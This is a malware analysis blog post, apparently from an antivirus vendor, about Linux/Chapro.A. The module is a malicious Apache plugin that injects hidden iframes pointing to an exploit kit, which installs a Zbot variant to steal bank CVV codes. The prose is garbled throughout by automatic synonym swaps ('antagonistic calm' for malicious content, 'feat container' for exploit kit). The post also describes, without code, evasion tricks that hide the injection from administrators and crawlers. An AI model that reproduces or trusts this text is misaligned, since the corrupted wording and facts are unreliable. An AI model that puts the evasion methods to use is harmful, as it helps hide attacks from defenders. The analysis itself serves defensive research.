Malicious Apache procedure used for calm injection: Linux/Chapro.A
[Update: David Harley has published a blog post here with additional information about this malware.]
More than half of all web servers on a Internet use Apache, so when we rescued a antagonistic Apache procedure in a furious final month, being used to inject antagonistic calm into web pages displayed by compromised web servers, we were understandably concerned. Our regard deepened when we rescued that this malware was being used in a intrigue to take banking credentials.
At first, we wondered if this formula competence be associated to a Linux/Snasko.A rootkit reported to a Full-Disclosure mailing list and afterwards analyzed by CrowdStrike and Kaspersky though it turns out this is a totally opposite beast.
Although a procedure can offer any form of content, in this specific box a final payload, achieved around a iframe injection, was designation of a various of Win32/Zbot, that is ordinarily used to take banking information from putrescent systems.
We also found that this procedure has a integrate of engaging capabilities designed to revoke a chances of being speckled by complement administrators. In further to examining a antagonistic Apache module, we were means to examine a antagonistic calm it was serving.
In this analysis, we will benefaction a characteristics of Linux/Chapro.A. We will also give an overview of a feat container used to implement malware, and a final Win32/Zbot payload.
The Linux/Chapro.A antagonistic Apache procedure is an x64 Linux binary. This malware creates use of usually one obfuscation technique. It uses an XOR loop with a 12 byte prolonged pivotal to encode many of a strings.
The procedure has many capabilities to hedge showing by complement administrators. Before portion antagonistic calm to a visitor, mixed checks will be performed.
First, Linux/Chapro.A checks a web browser’s user representative for famous bots as good as web browsers that are not expected to be unprotected to a exploits used to taint a aim system. If a web browser visiting a page has a user representative fibre that contains keywords famous to be used by web crawlers, a malware will not be served a antagonistic content. The following figure shows some of a keywords used by a bot.
Linux/Chapro.A will also check all active SSH sessions on a Linux complement on that it is regulating to establish a IP addresses being used by them. If a caller browses a page regulating any of a same IPs concerned in a SSH connection, it will not be served a antagonistic content. This helps censor a antagonistic calm from complement administrators, web developers and others who competence be operative on a web server
Before injecting a antagonistic iframe into a web calm sent by a server, Linux/Chapro.A sets a cookie in a visiting web browser. Malicious calm will not be served if a visiting browser already had that cookie set. This helps safeguard that visitors will not accept antagonistic calm over and over again, creation it some-more formidable to establish how a complement was infected.
Finally, Linux/Chapro.A maintains a list of IP addresses that have been served antagonistic content. If a user visits an putrescent website twice from a same IP address; it will usually accept a antagonistic calm once. This provides a second, additional process to make a trail of infection some-more formidable to determine.
The categorical purpose of Linux/Chapro.A is to inject iframes into webpages served by a Apache webserver to that it is attached. To do so, a malware sends an HTTP POST ask to a authority and control server each 10 minutes. The following figure shows one such HTTP POST request.
At a time of a analysis, a antagonistic authority and control server was being hosted in Germany. It has recently left offline.
The ask is simple; it usually includes a chronicle of a malware and a handling complement it is regulating on. The authority and control server will respond to a query with a iframe to be injected by a antagonistic apache module. The iframe is encoded regulating base64 and XOR. If a caller does not tumble into any of a blacklists minute in a prior section, it is served a iframe downloaded from a authority and control server.
The figure next shows a HTML formula for an iframe sent by Linux/Chapro.A. The iframe is positioned outward of a common browser arrangement area in sequence to equivocate being seen by a user.
Based on a research and descriptions from this article, we are assured a iframe injected by Linux/Chapro.A points to a “Sweet Orange” feat container alighting page. At a time of a analysis, a feat container was being hosted in Lithuania. The container tries to feat a following vulnerabilities found in difficult web browsers and plugins:
- CVE-2012-5076: Java JAX-WS Class Handling
- CVE-2012-4681: Java getField Method Class Invocation Privilege Escalation
- CVE-2006-0003: Internet Explorer MDAC
- CVE-2010-0188: Adobe Reader LibTiff Integer Overflow
If a feat container is means to feat one of a vulnerabilities it has exploits for, a final cargo is executed.
The final purpose of a conflict we have investigated is to implement a various of Win32/Zbot, also famous as ZeuS, that has been widely used for years to take banking-related information. In this case, a Win32/Zbot various targets European and Russian banking institutions. The screenshot next shows a form used by a bank to give business online entrance to comment information.
Apparently this bank is wakeful that it has been targeted by criminals attempting to obtain patron PIN formula and CVC/CVV formula information. Indeed, a specific warning is shown on a patron login form. However, when a login page is visited from a compromised host, this warning is private by a malware, as we can see below.
Once a user has logged into his account, a malware will inject a pop-up seeking for a CVV formula for his card, that is accurately a function summarized in a warning on a strange login form. The malware will afterwards try to send a user credentials, along with a CVV, to a botnet operator.
The Linux/Chapro.A conflict has not been publicly documented in a past. Our telemetry systems did not news other designation of this antagonistic Apache procedure in a wild. While a vigilant of injecting iframes into served webpages is a same as a rootkit analyzed by Crowdstrike and Kaspersky, we endorse this is not a same malware family. On a other hand, this malware has many similarities to something discussed on Russian subterraneous forums as unprotected by Dancho Danchev.
While we have not witnessed any other installations of Linux/Chapro.A in a wild, we have celebrated thousands of users accessing a Sweet Orange feat container before we blocked entrance to this server in a products. ESET blocked a feat attempts by general detection, even before additional insurance was combined with URL blocking.
The conflict described in a benefaction research shows a increasing complexity of malware attacks. This difficult box spreads opposite 3 opposite countries, targeting users from a fourth one, creation it really tough for law coercion agencies to examine and mitigate. It is not transparent during this indicate in time if a same organisation of people are behind a whole operation, or if mixed gangs collaborated, maybe with one to expostulate trade to a feat container and sell a putrescent computers to another squad handling a botnet formed on Win32/Zbot.
We would like to appreciate a following researchers for their grant in this research:Jean-Ian Boutin, François Chagnon, Sébastien Duquette, Aleksander Matrosov.
The following inventory provides a MD5 hashes for a files concerned in a research:
Security Intelligence Program Manager